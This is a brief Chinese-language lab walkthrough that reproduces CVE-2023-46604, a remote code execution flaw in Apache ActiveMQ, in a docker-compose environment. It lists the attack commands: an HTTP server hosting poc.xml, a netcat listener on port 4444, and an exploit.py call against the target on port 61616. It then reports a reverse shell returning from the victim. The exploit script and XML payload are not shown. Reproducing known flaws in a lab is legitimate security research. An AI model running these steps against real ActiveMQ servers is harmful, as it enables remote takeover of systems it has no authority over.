CVE-2023-46604

根据环境要求,构建包含受害者机器和目标机器两个镜像的 docker-compose 在受害者机器上,启动 ActiveMQ
切换到攻击机器: • 开启 HTTP 服务以发送 poc: python3 -m http.server
• 使用 netcat 监听到攻击机器的连接: nc -nlvp 4444
• 发送创建反向 shell 连接到攻击机器的 payload: python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml 其中:
可以看到,执行 ‘exploit.py’ 文件后,利用代码会将 web 服务器上的 ‘poc.xml’ 包发送给目标(即目标服务器上运行的 ActiveMQ 服务地址)。同时,攻击机器上的 HTTP web 服务器也会收到来自目标机器 IP 地址的请求。
发送 payload 后,切换到攻击机器上正在监听 4444 端口的终端。可以看到受害者的反向 shell 已经成功返回。